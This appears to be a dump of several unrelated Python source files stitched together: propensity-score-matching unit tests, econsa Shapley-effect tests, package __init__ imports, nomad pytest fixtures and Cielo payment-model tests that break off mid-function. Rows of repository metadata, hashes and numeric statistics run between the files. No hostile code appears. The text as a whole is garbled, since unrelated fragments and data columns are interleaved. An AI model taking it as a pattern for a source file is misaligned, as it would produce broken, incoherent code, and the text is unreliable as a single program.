treated, design_matrix = self.load_data(DATASET1, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
pscore_fit = psm.pscore
pscore_actual = DATASET1['_pscore']
mean_diff = np.mean(np.abs(pscore_fit-pscore_actual))
self.assertAlmostEqual(mean_diff, 0)
def test_set2_pscores_should_equal_data_pscores(self):
treated, design_matrix = self.load_data(DATASET2, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
pscore_fit = psm.pscore
pscore_actual = DATASET2['_pscore']
mean_diff = np.mean(np.abs(pscore_fit-pscore_actual))
self.assertAlmostEqual(mean_diff, 0)
def test_set3_pscores_should_equal_data_pscores(self):
treated, design_matrix = self.load_data(DATASET3, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
pscore_fit = psm.pscore
pscore_actual = DATASET3['_pscore']
mean_diff = np.mean(np.abs(pscore_fit-pscore_actual))
self.assertAlmostEqual(mean_diff, 0)
def test_set1_matches_should_equal_actual_matches(self):
treated, design_matrix = self.load_data(DATASET1, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
id_list = psm.matches
test_list, true_list = DATASET1["_id"][id_list], DATASET1["_n1"]
#Raise AssertionError if id_list cannot match the order of id and n1
np.testing.assert_array_equal(test_list, true_list)
#Explicitly test matching without nan values
test_list = test_list[np.isfinite(test_list)]
true_list = true_list[np.isfinite(true_list)]
self.assertTrue(np.array_equal(test_list, true_list))
def test_set2_matches_should_equal_actual_matches(self):
treated, design_matrix = self.load_data(DATASET2, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
id_list = psm.matches
test_list, true_list = DATASET2["_id"][id_list], DATASET2["_n1"]
#Raise AssertionError if id_list cannot match the order of id and n1
np.testing.assert_array_equal(test_list, true_list)
#Explicitly test matching without nan values
test_list = test_list[np.isfinite(test_list)]
true_list = true_list[np.isfinite(true_list)]
self.assertTrue(np.array_equal(test_list, true_list))
def test_set3_matches_should_equal_actual_matches(self):
treated, design_matrix = self.load_data(DATASET3, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
id_list = psm.matches
test_list, true_list = DATASET3["_id"][id_list], DATASET3["_n1"]
#Raise AssertionError if id_list cannot match the order of id and n1
np.testing.assert_array_equal(test_list, true_list)
#Explicitly test matching without nan values
test_list = test_list[np.isfinite(test_list)]
true_list = true_list[np.isfinite(true_list)]
self.assertTrue(np.array_equal(test_list, true_list))
def test_set1_unmatched_treated_mean_should_equal_6349(self):
treated, design_matrix = self.load_data(DATASET1, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET1['RE78'])
res = psm.unmatched_treated_mean
self.assertAlmostEqual(res, 6349.1435, places=4)
def test_set1_matched_treated_mean_should_equal_6349(self):
treated, design_matrix = self.load_data(DATASET1, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET1['RE78'])
res = psm.matched_treated_mean
self.assertAlmostEqual(res, 6349.1435, places=4)
def test_set1_unmatched_control_mean_should_equal_4554(self):
treated, design_matrix = self.load_data(DATASET1, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET1['RE78'])
res = psm.unmatched_control_mean
self.assertAlmostEqual(res, 4554.80112, places=4)
def test_set1_matched_control_mean_should_equal_5341(self):
treated, design_matrix = self.load_data(DATASET1, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET1['RE78'])
res = psm.matched_control_mean
self.assertAlmostEqual(res, 5341.43016, places=4)
def test_set1_ATT_should_equal_1007(self):
treated, design_matrix = self.load_data(DATASET1, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET1['RE78'])
res = psm.att
self.assertAlmostEqual(res, 1007.71335, places=4)
def test_set2_unmatched_treated_mean_should_equal_6349(self):
treated, design_matrix = self.load_data(DATASET2, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET2['RE78'])
res = psm.unmatched_treated_mean
self.assertAlmostEqual(res, 6349.1435, places=4)
def test_set2_matched_treated_mean_should_equal_6349(self):
treated, design_matrix = self.load_data(DATASET2, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET2['RE78'])
res = psm.matched_treated_mean
self.assertAlmostEqual(res, 6349.1435, places=4)
def test_set2_unmatched_control_mean_should_equal_4554(self):
treated, design_matrix = self.load_data(DATASET2, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET2['RE78'])
res = psm.unmatched_control_mean
self.assertAlmostEqual(res, 4554.80112, places=4)
def test_set2_matched_control_mean_should_equal_3397(self):
treated, design_matrix = self.load_data(DATASET2, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET2['RE78'])
res = psm.matched_control_mean
self.assertAlmostEqual(res, 3397.68807, places=4)
def test_set2_ATT_should_equal_2951(self):
treated, design_matrix = self.load_data(DATASET2, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET2['RE78'])
res = psm.att
self.assertAlmostEqual(res, 2951.45543, places=4)
def test_set3_unmatched_treated_mean_should_equal_6349(self):
treated, design_matrix = self.load_data(DATASET3, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET3['RE78'])
res = psm.unmatched_treated_mean
self.assertAlmostEqual(res, 6349.1435, places=4)
def test_set3_matched_treated_mean_should_equal_6349(self):
treated, design_matrix = self.load_data(DATASET3, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET3['RE78'])
res = psm.matched_treated_mean
self.assertAlmostEqual(res, 6349.1435, places=4)
def test_set3_unmatched_control_mean_should_equal_4554(self):
treated, design_matrix = self.load_data(DATASET3, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET3['RE78'])
res = psm.unmatched_control_mean
self.assertAlmostEqual(res, 4554.80112, places=4)
def test_set3_matched_control_mean_should_equal_4148(self):
treated, design_matrix = self.load_data(DATASET3, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET3['RE78'])
res = psm.matched_control_mean
self.assertAlmostEqual(res, 4148.65249, places=4)
def test_set3_ATT_should_equal_2200(self):
treated, design_matrix = self.load_data(DATASET3, [1])
psm = PSM.StatisticalMatching()
psm.fit(treated, design_matrix)
psm.match()
psm.results(DATASET3['RE78'])
res = psm.att
self.assertAlmostEqual(res, 2200.49101, places=4)
class TestMahalanobisMatchingClass(unittest.TestCase):
pass
if __name__ == '__main__':
unittest.main()
| 40.629139
| 76
| 0.678566
| 1,563
| 12,270
| 5.052463
| 0.105566
| 0.06838
| 0.103457
| 0.048626
| 0.845258
| 0.821958
| 0.810308
| 0.800051
| 0.790427
| 0.777131
| 0
| 0.038478
| 0.218419
| 12,270
| 301
| 77
| 40.76412
| 0.784984
| 0.073676
| 0
| 0.698347
| 0
| 0
| 0.032534
| 0.008464
| 0
| 0
| 0
| 0
| 0.136364
| 1
| 0.115702
| false
| 0.004132
| 0.020661
| 0
| 0.152893
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2a1fc1791271eed5769d9f3cb90ad79b8bec9d3b
| 3,561
|
py
|
Python
|
econsa/tests/test_shapley.py
|
OpenSourceEconomics/econsa
|
bb591c1382c97f65d557513c5cfb3febff0e0821
|
[
"MIT"
] | 3
|
2020-07-17T15:05:52.000Z
|
2020-10-23T06:21:13.000Z
|
econsa/tests/test_shapley.py
|
OpenSourceEconomics/econsa
|
bb591c1382c97f65d557513c5cfb3febff0e0821
|
[
"MIT"
] | 65
|
2020-05-14T13:36:12.000Z
|
2021-06-22T15:45:15.000Z
|
econsa/tests/test_shapley.py
|
OpenSourceEconomics/econsa
|
bb591c1382c97f65d557513c5cfb3febff0e0821
|
[
"MIT"
] | 4
|
2020-07-15T13:51:52.000Z
|
2021-08-31T06:58:33.000Z
|
"""Tests for the Shapley effects.
This module contains all tests for the Shapley effects.
"""
import chaospy as cp
import numpy as np
import pandas as pd
from numpy.testing import assert_array_almost_equal as aaae
from econsa.shapley import _r_condmvn
from econsa.shapley import get_shapley
def test_get_shapley_exact():
def gaussian_model(x):
return np.sum(x, 1)
def x_all(n):
distribution = cp.MvNormal(mean, cov)
return distribution.sample(n)
def x_cond(n, subset_j, subsetj_conditional, xjc):
if subsetj_conditional is None:
cov_int = np.array(cov)
cov_int = cov_int.take(subset_j, axis=1)
cov_int = cov_int[subset_j]
distribution = cp.MvNormal(mean[subset_j], cov_int)
return distribution.sample(n)
else:
return _r_condmvn(
n,
mean=mean,
cov=cov,
dependent_ind=subset_j,
given_ind=subsetj_conditional,
x_given=xjc,
)
np.random.seed(123)
n_inputs = 3
mean = np.zeros(3)
cov = np.array([[1.0, 0, 0], [0, 1.0, 1.8], [0, 1.8, 4.0]])
method = "exact"
n_perms = None
n_output = 10 ** 4
n_outer = 10 ** 3
n_inner = 10 ** 2
col = ["X" + str(i) for i in np.arange(n_inputs) + 1]
names = ["Shapley effects", "std. errors", "CI_min", "CI_max"]
expected = pd.DataFrame(
data=[
[0.101309, 0.418989, 0.479701],
[0.00241549, 0.16297, 0.163071],
[0.096575, 0.0995681, 0.160083],
[0.106044, 0.73841, 0.79932],
],
index=names,
columns=col,
).T
calculated = get_shapley(
method,
gaussian_model,
x_all,
x_cond,
n_perms,
n_inputs,
n_output,
n_outer,
n_inner,
)
aaae(calculated, expected)
def test_get_shapley_random():
def gaussian_model(x):
return np.sum(x, 1)
def x_all(n):
distribution = cp.MvNormal(mean, cov)
return distribution.sample(n)
def x_cond(n, subset_j, subsetj_conditional, xjc):
if subsetj_conditional is None:
cov_int = np.array(cov)
cov_int = cov_int.take(subset_j, axis=1)
cov_int = cov_int[subset_j]
distribution = cp.MvNormal(mean[subset_j], cov_int)
return distribution.sample(n)
else:
return _r_condmvn(
n,
mean=mean,
cov=cov,
dependent_ind=subset_j,
given_ind=subsetj_conditional,
x_given=xjc,
)
np.random.seed(123)
n_inputs = 3
mean = np.zeros(3)
cov = np.array([[1.0, 0, 0], [0, 1.0, 1.8], [0, 1.8, 4.0]])
method = "random"
n_perms = 30000
n_output = 10 ** 4
n_outer = 1
n_inner = 3
col = ["X" + str(i) for i in np.arange(n_inputs) + 1]
names = ["Shapley effects", "std. errors", "CI_min", "CI_max"]
expected = pd.DataFrame(
data=[
[0.107543, 0.414763, 0.477694],
[0.00307984, 0.0032332, 0.0031896],
[0.101507, 0.408426, 0.471442],
[0.11358, 0.4211, 0.483945],
],
index=names,
columns=col,
).T
calculated = get_shapley(
method,
gaussian_model,
x_all,
x_cond,
n_perms,
n_inputs,
n_output,
n_outer,
n_inner,
)
aaae(calculated, expected)
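# A hedged sketch of the callable contract exercised above: get_shapley expects
# a model f(X) -> y, an unconditional sampler x_all(n), and a conditional
# sampler x_cond(n, subset_j, subsetj_conditional, xjc), with samplers returning
# draws shaped (dim, n) as chaospy does. The stand-ins below are illustrative,
# not taken from the econsa test suite.
import numpy as np

def tiny_model(x):
    return np.sum(x, 1)  # same additive toy model as the tests above

def tiny_x_all(n):
    return np.random.standard_normal((3, n))

def tiny_x_cond(n, subset_j, subsetj_conditional, xjc):
    # with independent inputs, conditioning changes nothing in this toy case
    return np.random.standard_normal((len(subset_j), n))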
| 25.255319
| 66
| 0.538051
| 476
| 3,561
| 3.836134
| 0.25
| 0.03943
| 0.030668
| 0.056955
| 0.728368
| 0.728368
| 0.710843
| 0.710843
| 0.710843
| 0.710843
| 0
| 0.099957
| 0.348217
| 3,561
| 140
| 67
| 25.435714
| 0.686773
| 0.024151
| 0
| 0.758621
| 0
| 0
| 0.025671
| 0
| 0
| 0
| 0
| 0
| 0.008621
| 1
| 0.068966
| false
| 0
| 0.051724
| 0.017241
| 0.189655
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2a529fe357d7ea56a228bd2f73708cbfff3d08db
| 94
|
py
|
Python
|
deepcarskit/quick_start/__init__.py
|
irecsys/DeepCARSKit
|
20b861728efa0b416075d2e26c102c509923848e
|
[
"MIT"
] | null | null | null |
deepcarskit/quick_start/__init__.py
|
irecsys/DeepCARSKit
|
20b861728efa0b416075d2e26c102c509923848e
|
[
"MIT"
] | null | null | null |
deepcarskit/quick_start/__init__.py
|
irecsys/DeepCARSKit
|
20b861728efa0b416075d2e26c102c509923848e
|
[
"MIT"
] | 1
|
2022-03-23T07:02:59.000Z
|
2022-03-23T07:02:59.000Z
|
from deepcarskit.quick_start.quick_start import run, objective_function, load_data_and_model
| 31.333333
| 92
| 0.882979
| 14
| 94
| 5.5
| 0.857143
| 0.25974
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074468
| 94
| 2
| 93
| 47
| 0.885057
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
2a617b9090b36dcb9ce0cc99372870093ff5228c
| 109
|
py
|
Python
|
roppylib/libformatstr/__init__.py
|
D4mianWayne/roppy
|
fa596f242f0ed05d1fb0ea8c0addb7af3eb010ca
|
[
"MIT"
] | 25
|
2020-04-15T14:12:15.000Z
|
2022-02-23T01:54:20.000Z
|
roppy/libformatstr/__init__.py
|
bee-san/roppy
|
8c957fd4a49f8f4ffdcc539ced17a63e12a0dd10
|
[
"MIT"
] | 1
|
2020-08-15T07:24:01.000Z
|
2020-08-15T07:24:01.000Z
|
roppy/libformatstr/__init__.py
|
bee-san/roppy
|
8c957fd4a49f8f4ffdcc539ced17a63e12a0dd10
|
[
"MIT"
] | 6
|
2020-07-06T01:10:34.000Z
|
2021-11-17T06:23:57.000Z
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from .core import *
from .pattern import *
from .guess import *
| 15.571429
| 22
| 0.651376
| 16
| 109
| 4.4375
| 0.75
| 0.28169
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010989
| 0.165138
| 109
| 6
| 23
| 18.166667
| 0.769231
| 0.366972
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
2a658f3b0f5e67c73acb3a9789de0e2469b7bac6
| 137
|
py
|
Python
|
src/middleware/__init__.py
|
kenoseni/Flight-Booking
|
ce67113dbf303a155274e02aa520d4d116197b9d
|
[
"MIT"
] | null | null | null |
src/middleware/__init__.py
|
kenoseni/Flight-Booking
|
ce67113dbf303a155274e02aa520d4d116197b9d
|
[
"MIT"
] | null | null | null |
src/middleware/__init__.py
|
kenoseni/Flight-Booking
|
ce67113dbf303a155274e02aa520d4d116197b9d
|
[
"MIT"
] | null | null | null |
"""Module that inports geenrate token function"""
from .generate_tokens import generate_token
from .token_required import token_required
| 34.25
| 49
| 0.839416
| 18
| 137
| 6.166667
| 0.611111
| 0.234234
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.10219
| 137
| 3
| 50
| 45.666667
| 0.902439
| 0.313869
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
aa7a05085fd4b69eab3b983bb7b13b2be5804e29
| 93
|
py
|
Python
|
tests/test_converters.py
|
tobyqin/pyhandy
|
8852259ec73816da7ba982cdc56c7a023ede57a3
|
[
"MIT"
] | null | null | null |
tests/test_converters.py
|
tobyqin/pyhandy
|
8852259ec73816da7ba982cdc56c7a023ede57a3
|
[
"MIT"
] | null | null | null |
tests/test_converters.py
|
tobyqin/pyhandy
|
8852259ec73816da7ba982cdc56c7a023ede57a3
|
[
"MIT"
] | null | null | null |
from eztools import converters
def test_to_int():
assert converters.to_int(123) == 123
| 15.5
| 40
| 0.741935
| 14
| 93
| 4.714286
| 0.714286
| 0.151515
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077922
| 0.172043
| 93
| 5
| 41
| 18.6
| 0.779221
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
aa8c27e1236ad488c196943a5f01fa30173680d2
| 824
|
py
|
Python
|
tests/conftest.py
|
i4s-pserrano/python-nomad
|
0f8dd9dfa1d448465be490f0acf9f5df96cd893f
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
i4s-pserrano/python-nomad
|
0f8dd9dfa1d448465be490f0acf9f5df96cd893f
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
i4s-pserrano/python-nomad
|
0f8dd9dfa1d448465be490f0acf9f5df96cd893f
|
[
"MIT"
] | null | null | null |
import nomad
import pytest
import tests.common as common
@pytest.fixture
def nomad_setup():
n = nomad.Nomad(host=common.IP, port=common.NOMAD_PORT, verify=False, token=common.NOMAD_TOKEN)
return n
@pytest.fixture
def nomad_setup_with_namespace():
n = nomad.Nomad(host=common.IP, port=common.NOMAD_PORT, verify=False, token=common.NOMAD_TOKEN, namespace=common.NOMAD_NAMESPACE)
return n
@pytest.fixture
def nomad_setup_vault_valid_token():
n = nomad.Nomad(host=common.IP, port=common.NOMAD_PORT, verify=False, token=common.NOMAD_TOKEN, vaulttoken=common.VAULT_POLICY_TOKEN)
return n
@pytest.fixture
def nomad_setup_vault_invalid_token():
n = nomad.Nomad(host=common.IP, port=common.NOMAD_PORT, verify=False, token=common.NOMAD_TOKEN, vaulttoken=common.VAULT_POLICY_INVALID_TOKEN)
return n
| 34.333333
| 145
| 0.785194
| 124
| 824
| 5.008065
| 0.193548
| 0.15942
| 0.10306
| 0.135266
| 0.805153
| 0.763285
| 0.763285
| 0.763285
| 0.57971
| 0.57971
| 0
| 0
| 0.110437
| 824
| 23
| 146
| 35.826087
| 0.847203
| 0
| 0
| 0.421053
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.210526
| false
| 0
| 0.157895
| 0
| 0.578947
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
6321f527ee0be728886bfa042df30cbd964ca5e6
| 154
|
py
|
Python
|
molmodmt/forms/classes/get/api_get_parmed_GromacsTopologyFile.py
|
LMMV/MolModMT
|
5725d6d5627b07edcbbd5e55318345a136b28c35
|
[
"MIT"
] | null | null | null |
molmodmt/forms/classes/get/api_get_parmed_GromacsTopologyFile.py
|
LMMV/MolModMT
|
5725d6d5627b07edcbbd5e55318345a136b28c35
|
[
"MIT"
] | null | null | null |
molmodmt/forms/classes/get/api_get_parmed_GromacsTopologyFile.py
|
LMMV/MolModMT
|
5725d6d5627b07edcbbd5e55318345a136b28c35
|
[
"MIT"
] | null | null | null |
def getting(item, atom_indices=None, **kwargs):
from .api_get_parmed_Structure import getting as _get
return _get(item, atom_indices, **kwargs)
| 25.666667
| 57
| 0.746753
| 22
| 154
| 4.909091
| 0.681818
| 0.148148
| 0.277778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.155844
| 154
| 5
| 58
| 30.8
| 0.830769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
2dae563b6663226520de5be991033361629f8f67
| 29
|
py
|
Python
|
midca/modules/_goalgen/goalgen/__init__.py
|
Heider1632/midca
|
ff61e1b291ae9a3aa784c75b4069f91884e26b2c
|
[
"MIT"
] | null | null | null |
midca/modules/_goalgen/goalgen/__init__.py
|
Heider1632/midca
|
ff61e1b291ae9a3aa784c75b4069f91884e26b2c
|
[
"MIT"
] | null | null | null |
midca/modules/_goalgen/goalgen/__init__.py
|
Heider1632/midca
|
ff61e1b291ae9a3aa784c75b4069f91884e26b2c
|
[
"MIT"
] | null | null | null |
from . import gengoal, goal, goalorg
| 29
| 29
| 0.827586
| 4
| 29
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 29
| 1
| 29
| 29
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
937a0377fb321e20e731ae57a004fb1927ed2c6d
| 30,094
|
py
|
Python
|
tests/test_models.py
|
DeveloperCielo/python-cielo-webservice
|
b40dc6a3b06d804e89751ef45ce8dc58d0f155aa
|
[
"MIT"
] | 3
|
2016-09-09T12:48:38.000Z
|
2020-03-09T20:53:59.000Z
|
tests/test_models.py
|
DeveloperCielo/python-cielo-webservice
|
b40dc6a3b06d804e89751ef45ce8dc58d0f155aa
|
[
"MIT"
] | null | null | null |
tests/test_models.py
|
DeveloperCielo/python-cielo-webservice
|
b40dc6a3b06d804e89751ef45ce8dc58d0f155aa
|
[
"MIT"
] | 2
|
2016-05-18T17:27:35.000Z
|
2021-06-22T21:27:37.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from unittest import TestCase
import pytest
import os
from cielo_webservice.models import (
Comercial, Cartao, Pedido, Pagamento, Autenticacao, Autorizacao, Token,
Transacao, Avs, Captura, Cancelamento, Erro, xml_to_object
)
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
class TestComercial(TestCase):
def test_validate(self):
with pytest.raises(TypeError) as excinfo:
Comercial(numero='1234', chave='1234')
assert 'numero precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Comercial(numero=1234, chave=1234)
assert 'chave precisa ser do tipo string.' in str(excinfo.value)
def test_repr(self):
comercial = Comercial(
numero=1006993069,
chave='25fbb99741c739dd84d7b06ec78c9bac718838630f30b112d033ce2e621b34f3'
)
self.assertEqual(
repr(comercial),
'<Comercial(numero=1006993069, chave=25fbb99741c739dd84d7b06ec78c9bac718838630f30b112d033ce2e621b34f3)>'
)
class TestCartao(TestCase):
def test_validate(self):
with pytest.raises(TypeError) as excinfo:
Cartao(
numero='1234', validade=201805, indicador=1,
codigo_seguranca=123, nome_portador='Fulano Silva'
)
assert 'numero precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Cartao(
numero=1234, validade='201805', indicador=1,
codigo_seguranca=123, nome_portador='Fulano Silva'
)
assert 'validade precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Cartao(
numero=1234, validade=201805, indicador='1',
codigo_seguranca=123, nome_portador='Fulano Silva'
)
assert 'indicador precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Cartao(
numero=1234, validade=201805, indicador=1,
codigo_seguranca='123', nome_portador='Fulano Silva'
)
assert 'codigo_seguranca precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Cartao(
numero=1234, validade=201805, indicador=1,
codigo_seguranca=123, nome_portador=123
)
assert 'nome_portador precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Cartao(token=123)
assert 'token precisa ser do tipo string.' in str(excinfo.value)
def test_repr(self):
cartao = Cartao(
numero=4012001037141112, validade=201805, indicador=1,
codigo_seguranca=123, nome_portador='Fulano Silva'
)
self.assertEqual(
repr(cartao),
'<Cartao(numero=4012001037141112, validade=201805, indicador=1, codigo_seguranca=123, nome_portador=Fulano Silva, token=None)>'
)
class TestPedido(TestCase):
def test_validate(self):
with pytest.raises(TypeError) as excinfo:
Pedido(
numero=1234, valor=10000, moeda=986,
data_hora='2011-12-07T11:43:37',
)
assert 'numero precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Pedido(
numero='1234', valor='10000', moeda=986,
data_hora='2011-12-07T11:43:37',
)
assert 'valor precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Pedido(
numero='1234', valor=10000, moeda='986',
data_hora='2011-12-07T11:43:37',
)
assert 'moeda precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Pedido(
numero='1234', valor=10000, moeda=986,
data_hora=20111207,
)
assert 'data_hora precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Pedido(
numero='1234', valor=10000, moeda=986,
data_hora='2011-12-07T11:43:37', descricao=123
)
assert 'descricao precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Pedido(
numero='1234', valor=10000, moeda=986,
data_hora='2011-12-07T11:43:37', idioma=123
)
assert 'idioma precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Pedido(
numero='1234', valor=10000, moeda=986,
data_hora='2011-12-07T11:43:37', taxa_embarque='123'
)
assert 'taxa_embarque precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Pedido(
numero='1234', valor=10000, moeda=986,
data_hora='2011-12-07T11:43:37', soft_descriptor=123
)
assert 'soft_descriptor precisa ser do tipo string.' in str(excinfo.value)
def test_repr(self):
pedido = Pedido(
numero='1234', valor=10000, moeda=986,
data_hora='2016-03-05T03:30:43.982543'
)
self.assertEqual(
repr(pedido),
'<Pedido(numero=1234, valor=10000, moeda=986, data_hora=2016-03-05T03:30:43.982543, descricao=None, idioma=PT, taxa_embarque=None, soft_descriptor=None)>'
)
class TestPagamento(TestCase):
def test_validate(self):
with pytest.raises(TypeError) as excinfo:
Pagamento(bandeira=1, produto=1, parcelas=1)
assert 'bandeira precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Pagamento(bandeira='visa', produto=1, parcelas=1)
assert 'produto precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Pagamento(bandeira='visa', produto='1', parcelas='1')
assert 'parcelas precisa ser do tipo inteiro.' in str(excinfo.value)
def test_repr(self):
pagamento = Pagamento(bandeira='visa', produto='1', parcelas=1)
self.assertEqual(
repr(pagamento),
'<Pagamento(bandeira=visa, produto=1, parcelas=1)>'
)
class TestAutenticacao(TestCase):
def test_validate(self):
with pytest.raises(TypeError) as excinfo:
Autenticacao(
codigo='1', mensagem='msg', data_hora='2011-12-07T11:43:37',
valor=10000, eci=7
)
assert 'codigo precisa ser do tipo inteiro.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Autenticacao(
codigo=1, mensagem=1, data_hora='2011-12-07T11:43:37',
valor=10000, eci=7
)
assert 'mensagem precisa ser do tipo string.' in str(excinfo.value)
with pytest.raises(TypeError) as excinfo:
Autenticacao(
